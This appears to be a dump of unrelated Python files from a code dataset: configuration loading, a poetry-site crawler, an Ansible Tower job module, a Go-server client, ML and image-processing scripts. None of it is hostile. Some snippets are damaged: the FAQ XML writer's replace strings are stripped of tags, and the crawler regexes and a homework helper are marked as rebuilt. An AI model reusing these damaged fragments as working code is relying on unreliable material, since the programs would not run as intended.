os.getenv('API_ID')\nAPI_HASH = os.getenv('API_HASH')\nBOT_TOKEN = os.getenv('BOT_TOKEN')\nTRANSLATION_SERVICE = os.getenv('TRANSLATION_SERVICE')\nDETECTION_SERVICE = os.getenv('DETECTION_SERVICE')\nGOOGLE_API_KEY = os.getenv('GOOGLE_API_KEY')\nYANDEX_API_TOKEN = os.getenv('YANDEX_TOKEN')\nYANDEX_FOLDER_ID = os.getenv('YANDEX_FOLDER_ID')\nDATABASE_URL = os.getenv('DATABASE_URL')\nIS_ADD_TO_DICTIONARY = os.getenv('IS_ADD_TO_DICTIONARY')\nABBYY_API_KEY = os.getenv('ABBYY_API_KEY')\nABBYY_API_TOKEN = ''\nIS_NEED_TO_REFRESH_ABBYY_API_TOKEN = os.getenv('IS_NEED_TO_REFRESH_ABBYY_API_TOKEN')\nSECOND_BEFORE_REFRESH_TOKEN = os.getenv('SECOND_BEFORE_REFRESH_TOKEN')\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298645726","text":"# !/usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport re\nimport requests\n\n\ndef crawl(start_url):\n base_url='http://so.gushiwen.org'\n\n req_headers={\n 'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'\n }\n\n res=requests.get(start_url,headers=req_headers)\n if res.status_code==requests.codes.ok:\n html=res.text\n\n # 获取所有诗的链接\n parttern_href=re.compile(r'
<span><a href=\"(.*?)\" target=\"_blank\">',flags=re.DOTALL)\n        # NB: the HTML literals inside this file's regexes were lost when the data\n        # was extracted; every pattern here is rebuilt (approximately) from the\n        # sample page structure quoted at the bottom of this file\n        hrefs=re.findall(parttern_href,html)\n\n        # fetch every poem and append it to the local file\n        with open('data/唐诗300首.txt',mode='a',encoding='utf-8') as f:\n            for href in hrefs:\n                href=base_url+href\n                res=requests.get(href,headers=req_headers)\n                if res.status_code == requests.codes.ok:\n                    html = res.text\n                    # title\n                    parttern_title = re.compile(r'<div class=\"cont\">.*?<h1>(.*?)</h1>', re.DOTALL)\n                    title=re.search(parttern_title,html).group(1)\n                    # dynasty\n                    parttern_dynasty = re.compile(r'<div class=\"cont\">.*?<p class=\"source\">(.*?):.*?</p>', re.DOTALL)\n                    dynasty=re.search(parttern_dynasty,html).group(1)\n                    # author\n                    parttern_author = re.compile(r'<div class=\"cont\">.*?<p class=\"source\">.*?:(.*?)</p>', re.DOTALL)\n                    author=re.search(parttern_author,html).group(1)\n                    # content\n                    parttern_content = re.compile(r'<div class=\"cont\">.*?<div class=\"contson\">(.*?)</div>', re.DOTALL)\n                    content=re.search(parttern_content,html).group(1)\n                    content=re.sub(r'<br />','\\n',content)\n                    content=re.sub(r'<p>','',content)\n                    content=re.sub(r'</p>','',content)\n\n                    print('正在获取 {title}'.format(title=title))\n                    f.write('{title}\\n{dynasty}:{author}\\n{content}\\n'.format(title=title,dynasty=dynasty,author=author,content=content))\n\n\"\"\"\nsample detail-page structure (tags rebuilt to match the patterns above):\n<div class=\"sons\">\n  <div class=\"cont\">\n    <div class=\"yizhu\">\n\"赏析\"\n\"注释\"\n\"译文\"\n    </div>\n    <h1>\n行宫\n    </h1>\n    <p class=\"source\">\n唐代:元稹\n    </p>\n    <div class=\"contson\">\n寥落古行宫,宫花寂寞红。<br />白头宫女在,闲坐说玄宗。\n    </div>\n  </div>\n</div>
    \n\"\"\"\n\n\n\nif __name__ == '__main__':\n start_url='http://so.gushiwen.org/gushi/tangshi.aspx'\n crawl(start_url)\n","sub_path":"02_PC端/古诗文网 - 唐诗300首爬虫.py","file_name":"古诗文网 - 唐诗300首爬虫.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80584630","text":"from quantz.strategy.ff.ff_base import *\nimport numpy as np\n\n\nclass CrossbarFF(BaseFF):\n def __init__(self, container):\n super().__init__(container)\n\n def _get_reward(self, transcation_list, debug):\n \"\"\"\n\n :param transcation_list: object\n object contains at least two properties: op_arr and price_arr\n :param debug:boolean\n :return: double\n a fitness score\n \"\"\"\n op_arr = transcation_list[\"op_arr\"]\n price_arr = transcation_list[\"price_arr\"]\n profit_arr = self._get_profit_by_op(op_arr, price_arr)\n fitness = np.sum(profit_arr)\n\n return fitness\n","sub_path":"quantz/strategy/ff/ff.py","file_name":"ff.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"222352853","text":"\"\"\"Definition of the Experts Event content type\n\"\"\"\n\nfrom zope.interface import implements\n\nfrom Products.Archetypes import atapi\nfrom Products.ATContentTypes.content import base\nfrom Products.ATContentTypes.content import schemata\n\n# -*- Message Factory Imported Here -*-\nfrom experts.product import productMessageFactory as _\n\nfrom experts.product.interfaces import IExpertsEvent\nfrom experts.product.config import PROJECTNAME\n\nExpertsEventSchema = schemata.ATContentTypeSchema.copy() + atapi.Schema((\n\n # -*- Your Archetypes field definitions here ... -*-\n\n atapi.StringField(\n 'venue',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Location\"),\n description=_(u\"Town and country\"),\n ),\n ),\n\n\n atapi.StringField(\n 'location',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Location\"),\n description=_(u\"Town and country\"),\n ),\n ),\n\n\n atapi.DateTimeField(\n 'startdate',\n storage=atapi.AnnotationStorage(),\n widget=atapi.CalendarWidget(\n label=_(u\"Start Date\"),\n description=_(u\"\"),\n ),\n validators=('isValidDate'),\n ),\n\n\n atapi.DateTimeField(\n 'enddate',\n storage=atapi.AnnotationStorage(),\n widget=atapi.CalendarWidget(\n label=_(u\"End Date\"),\n description=_(u\"\"),\n ),\n validators=('isValidDate'),\n ),\n\n\n atapi.StringField(\n 'eventtype',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Event Type\"),\n description=_(u\"Workshop/Conference/Training/Meeting\"),\n ),\n ),\n\n\n atapi.StringField(\n 'project',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Project / Programme\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.TextField(\n 'partners',\n storage=atapi.AnnotationStorage(),\n widget=atapi.TextAreaWidget(\n label=_(u\"Partners\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.StringField(\n 'location',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"Location\"),\n description=_(u\"Town and Country\"),\n ),\n ),\n\n\n atapi.TextField(\n 'organizers',\n storage=atapi.AnnotationStorage(),\n widget=atapi.TextAreaWidget(\n label=_(u\"Organizer(s)\"),\n description=_(u\"\"),\n ),\n ),\n\n\n atapi.TextField(\n 'contact',\n storage=atapi.AnnotationStorage(),\n widget=atapi.TextAreaWidget(\n label=_(u\"Contact\"),\n description=_(u\"\"),\n 
),\n ),\n\n\n atapi.StringField(\n 'url',\n storage=atapi.AnnotationStorage(),\n widget=atapi.StringWidget(\n label=_(u\"URL\"),\n description=_(u\"\"),\n ),\n ),\n\n\n))\n\n# Set storage on fields copied from ATContentTypeSchema, making sure\n# they work well with the python bridge properties.\n\nExpertsEventSchema['title'].storage = atapi.AnnotationStorage()\nExpertsEventSchema['description'].storage = atapi.AnnotationStorage()\n\nschemata.finalizeATCTSchema(ExpertsEventSchema, moveDiscussion=False)\n\n\nclass ExpertsEvent(base.ATCTContent):\n \"\"\"Sweetpotato experts event\"\"\"\n implements(IExpertsEvent)\n\n meta_type = \"ExpertsEvent\"\n schema = ExpertsEventSchema\n\n title = atapi.ATFieldProperty('title')\n description = atapi.ATFieldProperty('description')\n\n # -*- Your ATSchema to Python Property Bridges Here ... -*-\n venue = atapi.ATFieldProperty('venue')\n\n location = atapi.ATFieldProperty('location')\n\n startdate = atapi.ATFieldProperty('startdate')\n\n enddate = atapi.ATFieldProperty('enddate')\n\n eventtype = atapi.ATFieldProperty('eventtype')\n\n project = atapi.ATFieldProperty('project')\n\n partners = atapi.ATFieldProperty('partners')\n\n location = atapi.ATFieldProperty('location')\n\n organizers = atapi.ATFieldProperty('organizers')\n\n contact = atapi.ATFieldProperty('contact')\n\n url = atapi.ATFieldProperty('url')\n\n schema.moveField('venue',after = 'partners')\n\natapi.registerType(ExpertsEvent, PROJECTNAME)\n","sub_path":"experts.product/experts/product/content/expertsevent.py","file_name":"expertsevent.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"216944185","text":"# load json and create model\nfrom tensorflow.python.keras.models import model_from_json\nfrom sklearn.metrics import classification_report\nfrom numpy import load\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n\ndata = load(\"PestData_Train.npz\")\nX, y = data['arr_0'],data['arr_1']\n\nprint(X.shape)\nprint(y.shape)\n\nX = np.array(X)\ny = np.array(y)\n# Normalizing X values between 0 to 1.\nX = X.astype('float32')\nX /= np.max(X)\n\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=36)\n\njson_file = open('CNN_model.json', 'r')\nloaded_model_json = json_file.read()\njson_file.close()\nmodel = model_from_json(loaded_model_json)\n# load weights into new model\nmodel.load_weights(\"CNN_weights.h5\")\nprint(\"Loaded model from disk\")\n\n# evaluate loaded model on test data\nmodel.compile(loss='binary_crossentropy',\n optimizer='rmsprop',\n metrics=['accuracy'])\n\nprint(\"Test data\")\nscore = model.evaluate(X_test, y_test, verbose=1)\nprint(\"%s: %.2f%%\" % (model.metrics_names[1], score[1]*100))\n\ny_preds = model.predict(X_test, verbose=1)\nprint(y_preds.shape)\n\nprint(y_preds[:10])\n\npreds = model.predict_classes(X_test, verbose=1)\nprint(preds.shape)\n\nprint(\"Actual healthy: \",len(y_test[y_test == 1]))\nprint(\"Predicted healthy: \",len(preds[preds == 1]))\n\nprint(classification_report(y_test, preds, target_names=['Non-healthy', 'Healthy']))\n","sub_path":"CNN_test.py","file_name":"CNN_test.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"78452575","text":"import json\nimport time\nimport requests\n\nfrom .messages import *\nimport kgs\n\n\nclass KgsConnection:\n \"\"\"\n Creates a connection to KGS.\n 
\"\"\"\n\n    MAX_TIME_INACTIVITY = 10\n\n    def __init__(self, url, user):\n        self._url = url\n        self._user = user\n        self._message_queue = list()\n        self._message_callbacks = dict()  # maps message type -> list of callables\n        self._cookies = None\n        self._keep_alive = True\n\n        self._formatter = MessageFormatter()\n        self._message_factory = MessageFactory()\n\n        self.init_sequence()\n\n    def init_sequence(self):\n        \"\"\"\n        Perform the initialization sequence with the servlet.\n\n        Basically, we perform the following operations:\n\n        * Send LOGIN message for logging in\n        * Immediately receive response to confirm data is OK\n        \"\"\"\n\n        login_response = self._send_message(LoginMessage('OSRBot', ''))\n\n        self._cookies = login_response.cookies  # NOM NOM NOM\n        hello_received = False\n\n        while not hello_received:\n            response = requests.get(self._url, cookies=self._cookies)\n            kgs_response = KgsResponse(self._message_factory, bytes.decode(response.content))\n\n            if response.ok:\n                for message in kgs_response.messages:\n                    if type(message) is HelloMessage:\n                        hello_received = True\n\n    def loop(self):\n        \"\"\"\n        Send queued messages and receive server responses.\n        :return: bool\n        \"\"\"\n\n        sleep_time = 0\n\n        # Send queued messages\n        while self._has_messages_to_process():\n            time.sleep(1)  # Don't hammer the server, civility is key here, folks.\n            message = self._dequeue_message()\n\n            if message is None:\n                sleep_time += 1\n                if sleep_time > self.MAX_TIME_INACTIVITY:\n                    # Add a WAKE_UP message so we don't appear as idle\n                    self.queue_message(WakeUpMessage())\n            else:\n                sleep_time = 0\n                response = self._send_message(message)\n                # TODO send something less stupid than an HttpResponse\n                for callbacks in self._message_callbacks.values():\n                    for callback in callbacks:\n                        callback(response)\n\n        # TODO : find some way to\n        return self._keep_alive\n\n    def _has_messages_to_process(self):\n        \"\"\"\n        Check if there are any messages left to send.\n        :return: True if any message remains in the queue.\n        \"\"\"\n        return len(self._message_queue) > 0\n\n    def queue_message(self, message):\n        \"\"\"\n        Add a message to the queue.\n\n        Messages should definitely NOT be sent directly through _send_message: the frequency by which we send messages\n        should be controlled since the KGS server does not like being spammed (and who does, really?)\n        \"\"\"\n        if not isinstance(message, Message):\n            raise ValueError(\"Not a Message\")\n\n        self._message_queue.append(message)\n\n    def _dequeue_message(self):\n        \"\"\"\n        Remove a message from the queue and return it.\n        :return: A Message object if any messages are left in the queue; None if no message remains.\n        \"\"\"\n        if len(self._message_queue) > 0:\n            return self._message_queue.pop(0)  # FIFO: oldest queued message first\n\n        return None\n\n    def _is_processable(self, message):\n        \"\"\"\n        Tells if a given message type will be processed or not. A message is \"processable\" if at least one callback was\n        given for it.\n        :param message: Message object\n        :return: True if at least one callback can be performed on that message type.\n        \"\"\"\n        return isinstance(message, Message)\\\n            and message.message_type in self._message_callbacks.keys()\\\n            and len(self._message_callbacks[message.message_type]) > 0\n\n    def add_message_callback(self, message_type, callback):\n        \"\"\"\n        Add a callback for a given message type response.\n\n        :param message_type: Message type (eg. 
HELLO, LOGIN, etc.)\n        :param callback: Callable to call with the message when we get a response.\n        \"\"\"\n        if not callable(callback):\n            raise ValueError(\"Callback must be a callable\")\n        elif not isinstance(message_type, str):\n            raise ValueError(\"Message type must be a string\")\n        elif message_type not in Message.supported_types:\n            raise ValueError(\"Message type is not supported, your pull requests are welcome\")\n\n        # Message isn't processable yet, add it to the dict of messages\n        if message_type not in self._message_callbacks.keys():\n            self._message_callbacks[message_type] = list()\n\n        # Add the callback for that message\n        self._message_callbacks[message_type].append(callback)\n\n    def remove_message_callback(self, message_type, callback):\n        \"\"\"\n        Remove a callback for a given message type response.\n\n        :param message_type: Message type (eg. HELLO, LOGIN, etc.)\n        :param callback: Callable to call with the message when we get a response.\n        \"\"\"\n        if message_type not in self._message_callbacks:\n            raise ValueError(\"No callbacks set for message \" + message_type)\n        elif callback not in self._message_callbacks[message_type]:\n            raise ValueError(\"Callback not found in \" + message_type)\n\n        lst = self._message_callbacks[message_type]\n        index = lst.index(callback)\n        del lst[index]\n\n    def _get_messages(self):\n        return requests.get(self._url, '')\n\n    def _send_message(self, message):\n        \"\"\"\n        Private method. Send a message to the server.\n        :param message: Message object to send to the server.\n        :return: HttpResponse\n        \"\"\"\n\n        if not isinstance(message, Message):\n            raise ValueError(\"Not a Message object\")\n\n        # Why would you perform a callback that will not be processed?\n        if not self._is_processable(message):\n            return\n\n        formatted_message = self._formatter.format_message(message)\n\n        if message.action == 'POST':\n            headers = {\"content-type\": \"application/json;charset=UTF-8\"}\n            response = requests.post(self._url, json=formatted_message, headers=headers)\n        elif message.action == 'GET':\n            response = requests.get(self._url, formatted_message)\n        else:\n            raise ValueError(\"Invalid action for message\")\n\n        return response\n\n    def close(self):\n        \"\"\"\n        Close the connection properly.\n        \"\"\"\n\n        self._send_message(LogoutPostMessage())\n        self._keep_alive = False\n        self._cookies = None\n\n\nclass KgsResponse:\n    \"\"\"\n    A response from the server (or rather, the servlet). 
It is simply a JSON object containing an array of messages that\n    will need to be parsed and made into proper Message objects.\n    \"\"\"\n\n    def __init__(self, message_factory, data):\n        self._messages = list()\n        self._message_factory = message_factory\n\n        self.parse_messages(data)\n\n    @property\n    def messages(self):\n        return self._messages\n\n    def parse_messages(self, data):\n        for message_dict in json.loads(data)['messages']:\n            self._messages.append(self.create_message(message_dict))\n\n    def create_message(self, message_dict):\n        return self._message_factory.create_message(message_dict)\n\n\n# TODO : Running as standalone to test stuff, remove this ASAP\nif __name__ == '__main__':\n    # TODO : create setting for actual URL\n    bot = kgs.types.user.User()\n\n    connection = KgsConnection('http://localhost:8080/jsonClient/access', bot)  # __init__ requires (url, user)\n\n    while connection.loop():\n        pass\n\n    connection.close()  # kthxbye\n","sub_path":"server/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":7700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"571198906","text":"import http.server\r\nimport socketserver\r\nimport logging\r\nimport cgi\r\n\r\nimport sys\r\n\r\ndef faqPY(text):\r\n    print(text)####\r\n    readFile=open(\"faq.xml\", \"r\")#Opens current XML doc to be read\r\n    #_______________________________________________________________\r\n    #faqText = text.getvalue(\"text\")\r\n\t#faqAnswer = text.getvalue(\"answer\")\r\n    #_______________________________________________________________\r\n    xmlContent = readFile.readlines()#xmlContent is list of file's current contents\r\n    string = \"\"\r\n    xmlString = string.join(xmlContent)\r\n    #_______________________________________________________________\r\n    replaceXML = xmlString.replace(\"......\",\"\\n\"+text[1]+\"\\n...\\n\"+\r\n\t\t\t\t\t\t\t\t   \"\\n......\")\r\n    #^Replaces empty contact element with Http data__________________\r\n    #^Fully converted and replaced XML with new elements to be written in file^\r\n    #________________________________________________________________\r\n    readFile.close()#~~~~~Closed XML file, no longer reading\r\n    print(replaceXML)\r\n    writeFile=open(\"faq.xml\", \"w\")#Re-Opens XML file in to write\r\n    writeFile.write(replaceXML)\r\n    writeFile.close()#Closed XML file, no longer writing\r\n    return\r\n","sub_path":"questions.py","file_name":"questions.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"376923619","text":"from network.SerotoninAVNetwork import *\nfrom scipy import *\n\nclass Simulation():\n    def __init__(self, params):\n        self.tau = 0.1 # In\n        self.params = params\n        self.tspan = arange(0, self.params[\"maxTime\"], self.tau)\n\n        self.network = SerotoninAVNetwork(self.tau, self, self.params, \"Test Network1\")\n\n    def run(self):\n        for t in self.tspan:\n            if t % 10 == 0:\n                print(\"Time: \", t)\n            self.network.step()","sub_path":"simulation/Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"498829596","text":"#!/usr/bin/env python\n#coding: utf-8 -*-\n\n# (c) 2016, Wayne Witzel III \n#\n# This module is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# 
This software is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this software. If not, see .\n\nDOCUMENTATION = '''\n---\nmodule: tower_job_launch\nversion_added: \"2.3\"\nshort_description: Launch an Ansible Job.\ndescription:\n - Launch an Ansible Tower jobs. See\n U(https://www.ansible.com/tower) for an overview.\noptions:\n job_template:\n description:\n - Name string of the job_template.\n required: True\n default: null\n job_explanation:\n description:\n - Job explanation field.\n required: False\n default: null\n job_type:\n description:\n - Job_type to use for the job, only used if prompt for job_type is set.\n required: False\n choices: [\"run\", \"check\", \"scan\"]\n default: null\n inventory:\n description:\n - Inventory to use for the job, only used if prompt for inventory is set.\n required: False\n default: null\n credential:\n description:\n - Credential to use for job, only used if prompt for credential is set.\n required: False\n default: null\n extra_vars:\n description:\n - Extra_vars to use for the job_template. Use '@' for a file.\n required: False\n default: null\n limit:\n description:\n - Limit to use for the job_template.\n required: False\n default: null\n tags:\n description:\n - Specific tags to use for from playbook.\n required: False\n default: null\n use_job_endpoint:\n description:\n - Disable launching jobs from job template.\n required: False\n default: False\n config_file:\n description:\n - Path to the Tower config file. See notes.\n required: False\n default: null\n\n\nrequirements:\n - \"ansible-tower-cli >= 3.0.2\"\n\nnotes:\n - If no I(config_file) is provided we will attempt to use the tower-cli library\n defaults to find your Tower host information.\n - I(config_file) should contain Tower configuration in the following format:\n host=hostname\n username=username\n password=password\n'''\n\n\nEXAMPLES = '''\n tower_job_launch:\n job_template: \"My Job Template\"\n config_file: \"~/tower_cli.cfg\"\n register: job\n tower_job_wait:\n job_id: job.id\n timeout: 120\n'''\n\nimport os\n\ntry:\n import tower_cli\n import tower_cli.utils.exceptions as exc\n from tower_cli.utils import parser\n from tower_cli.conf import settings\n\n HAS_TOWER_CLI = True\nexcept ImportError:\n HAS_TOWER_CLI = False\n\n\ndef tower_auth_config(module):\n config_file = module.params.get('config_file')\n if not config_file:\n return {}\n\n config_file = os.path.expanduser(config_file)\n if not os.path.exists(config_file):\n module.fail_json(msg='file not found: %s' % config_file)\n if os.path.isdir(config_file):\n module.fail_json(msg='directory can not be used as config file: %s' % config_file)\n\n with open(config_file, 'rb') as f:\n return parser.string_to_dict(f.read())\n\n\ndef main():\n module = AnsibleModule(\n argument_spec = dict(\n job_template = dict(required=True),\n job_type = dict(choices=['run', 'check', 'scan']),\n inventory = dict(),\n credential = dict(),\n limit = dict(),\n tags = dict(),\n extra_vars = dict(type='list', required=False),\n config_file = dict(),\n ),\n supports_check_mode=False\n )\n\n if not HAS_TOWER_CLI:\n module.fail_json(msg='ansible-tower-cli required for this module')\n\n json_output = {}\n\n tower_auth = tower_auth_config(module)\n with 
settings.runtime_values(**tower_auth):\n try:\n params = module.params.copy()\n job = tower_cli.get_resource('job')\n\n try:\n jt_name = params.pop('job_template')\n jt = tower_cli.get_resource('job_template').get(name=jt_name)\n except exc.NotFound as excinfo:\n module.fail_json(msg='{} job_template: {}'.format(excinfo, jt_name), changed=False)\n\n result = job.launch(jt['id'], no_input=True, **params)\n json_output['id'] = result['id']\n json_output['status'] = result['status']\n except (exc.ConnectionError, exc.BadRequest) as excinfo:\n module.fail_json(msg='{}'.format(excinfo), changed=False)\n\n json_output['changed'] = result['changed']\n module.exit_json(**json_output)\n\n\nfrom ansible.module_utils.basic import AnsibleModule\nif __name__ == '__main__':\n main()\n","sub_path":"library-old/tower_job_launch.py","file_name":"tower_job_launch.py","file_ext":"py","file_size_in_byte":5177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525113722","text":"#6 Escribí un programa que dada una lista de strings verifique si se encuentran en una frase dada.\n\nimport re\nlista_strings = [\"hoy\", \"sol\", \"pileta\",\"amigos\"]\nfrase = \"Hoy tomamos sol en la playa con mis amigos\"\nfor i in lista_strings:\n patron = i\n if re.search(patron, frase) is not None:\n print(\"la palabra \" + r\"'\" + i + r\"'\" \" se encuentra en la frase dada\")\n else:\n print(\"la palabra \" + r\"'\" + i + r\"'\" \" no se encuentra en la frase dada\")","sub_path":"expresiones regulares/tp 3 ej6.py","file_name":"tp 3 ej6.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215661273","text":"'''\r\nAbbiamo immagini in formato png ottenute inserendo su di uno sfondo monocolore rettangoli\r\ndi vari colori i cui assi sono sempre parallei agli assi dell'immagine.\r\n\r\nVedi ad esempio l'immagine Img1.png\r\n\r\nPer caricare e salvare immagini PNG usate le funzioni load e save che abbiamo preparato nel modulo immagini.py .\r\n\r\nScrivere una funzione quadrato(filename, C) che prende in input:\r\n- il percorso di un file (filename) che contine un immagine in formato png della tipologia appena descritta.\r\n- una tupla C che rappresenta un colore in formato RGB (3 valori interi tra 0 e 255 compresi)\r\n\r\nLa funzione deve restituire nell'ordine:\r\n- la lunghezza del lato del quadrato pieno di dimensione massima e colore C interamente visibile nell'immagine.\r\n- le coordinate (x,y) del pixel dell'immagine che corrisponde alla posizione all'interno dell'immagine del punto in alto a sinistra del quadrato.\r\n\r\nIn caso ci siano più quadrati di dimensione massima, va considerato quello il cui punto\r\nin alto a sinistra occupa la riga minima (e a parita' di riga la colonna minima) all'interno dell' immagine.\r\n\r\nSi può assumere che nell'immagine e' sempre presente almeno un pixel del colore cercato.\r\n\r\nPer gli esempi vedere il file grade01.txt\r\n\r\nATTENZIONE: Il timeout è impostato a 10*N secondi (con N numero di test del grader).\r\n'''\r\n\r\nfrom immagini import *\r\n\r\ndef getW(img):\r\n return len(img[0])\r\n\r\ndef getH(img):\r\n return len(img)\r\n\r\ndef buildPrefixSum(psum, img, c):\r\n W, H = getW(img), getH(img)\r\n for i in range(H+1):\r\n psum.append([])\r\n for j in range(W+1):\r\n if i == 0 or j == 0:\r\n psum[i].append(0)\r\n else:\r\n psum[i].append((0 if img[i-1][j-1] != c else 1) + psum[i-1][j] + psum[i][j-1] - psum[i-1][j-1])\r\n\r\ndef 
queryPrefixSum(psum, i1, j1, i2, j2):\r\n    return psum[i2+1][j2+1] - psum[i2+1][j1] - psum[i1][j2+1] + psum[i1][j1]\r\n\r\ndef updateBestAnsw(img, i, j, c, bestLen, bestX, bestY, psum, H, W):\r\n    # the body of this function and the head of quadrato() were lost to\r\n    # extraction damage; they are reconstructed here from the surrounding\r\n    # helpers: grow the square anchored at (row i, col j) while it stays\r\n    # inside the image and consists only of pixels of colour c\r\n    if img[i][j] == c:\r\n        while i+bestLen < H and j+bestLen < W and \\\r\n              queryPrefixSum(psum, i, j, i+bestLen, j+bestLen) == (bestLen+1)**2:\r\n            bestLen, bestX, bestY = bestLen+1, j, i\r\n    return bestLen, bestX, bestY\r\n\r\ndef quadrato(filename, C):\r\n    img = load(filename)\r\n    W, H = getW(img), getH(img)\r\n    c = C\r\n    psum = []\r\n    buildPrefixSum(psum, img, c)\r\n    bestLen, bestX, bestY = 0, 0, 0\r\n    for i in range(H):\r\n        if i + bestLen >= H:\r\n            break\r\n        for j in range(W):\r\n            if j + bestLen >= W:\r\n                break\r\n            bestLen, bestX, bestY = updateBestAnsw(img, i, j, c, bestLen, bestX, bestY, psum, H, W)\r\n    return (bestLen, (bestX, bestY))\r\n\r\nif __name__=='__main__':\r\n    print(quadrato('test.png', (0,0,0)))\r\n","sub_path":"students/1811809/homework03/program01.py","file_name":"program01.py","file_ext":"py","file_size_in_byte":2849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"328315280","text":"#!/usr/bin/python2.6\n#\n# Copyright (C) Christian Thurau, 2010. \n# Licensed under the GNU General Public License (GPL). \n# http://www.gnu.org/licenses/gpl.txt\n#$Id: sivm.py 22 2010-08-13 11:16:43Z cthurau $\n#$Author: cthurau $\n\"\"\" \nPyMF Simplex Volume Maximization for CUR [1]\n\n\tSIVM: class for SiVM\n\n[1] C. Thurau, K. Kersting, and C. Bauckhage. Yes We Can - Simplex Volume \nMaximization for Descriptive Web-Scale Matrix Factorization. In Proc. Int. \nConf. on Information and Knowledge Management. ACM. 2010.\n\"\"\"\n\n__version__ = \"$Revision: 11 $\"\n\nimport scipy.sparse\nimport numpy as np\nfrom scipy import inf\n\nfrom dist import *\nfrom aa import AA\n\n__all__ = [\"SIVM\"]\n\nclass SIVM(AA):\n\t\"\"\" \t\n\tSIVM(data, num_bases=4, niter=100, show_progress=True, compW=True)\n\t\n\t\n\tSimplex Volume Maximization. Factorize a data matrix into two matrices s.t.\n\tF = | data - W*H | is minimal. H is restricted to convexity. W is iteratively\n\tfound by maximizing the volume of the resulting simplex (see [1]).\n\t\n\tParameters\n\t----------\n\tdata : array_like\n\t\tthe input data\n\tnum_bases: int, optional \n\t\tNumber of bases to compute (column rank of W and row rank of H). \n\t\t4 (default)\n\tniter: int, optional\n\t\tNumber of iterations of the alternating optimization.\n\t\t100 (default)\n\tshow_progress: bool, optional\n\t\tPrint some extra information\n\t\tFalse (default)\n\tcompW: bool, optional\n\t\tCompute W (True) or only H (False). Useful for using basis vectors\n\t\tfrom another convexity constrained matrix factorization function\n\t\t(e.g. svmnmf) (if set to \"True\" niter can be set to \"1\")\n\tcompH: bool, optional\n\t\tCompute H (True) or only H (False). Useful for using precomputed\n\t\tbasis vectors.\n\tdist_measure: string, optional\n\t\tThe distance measure for finding the next best candidate that \n\t\tmaximizes the simplex volume ['l2','l1','cosine','sparse_graph_l2']\n\t\t'l2' (default)\n\toptimize_lower_bound: bool, optional\n\t\tUse the alternative selection criterion that optimizes the lower\n\t\tbound (see [1])\n\t\tFalse (default)\n\t\n\tAttributes\n\t----------\n\t\tW : \"data_dimension x num_bases\" matrix of basis vectors\n\t\tH : \"num bases x num_samples\" matrix of coefficients\n\t\t\n\t\tferr : frobenius norm (after applying .factoriz())\t\t\n\t\n\tExample\n\t-------\n\tApplying SIVM to some rather stupid data set:\n\t\n\t>>> import numpy as np\n\t>>> data = np.array([[1.0, 0.0, 2.0], [0.0, 1.0, 1.0]])\n\t>>> sivm_mdl = SIVM(data, num_bases=2, niter=10)\n\t>>> sivm_mdl.initialization()\n\t>>> sivm_mdl.factorize()\n\t\n\tThe basis vectors are now stored in sivm_mdl.W, the coefficients in sivm_mdl.H. 
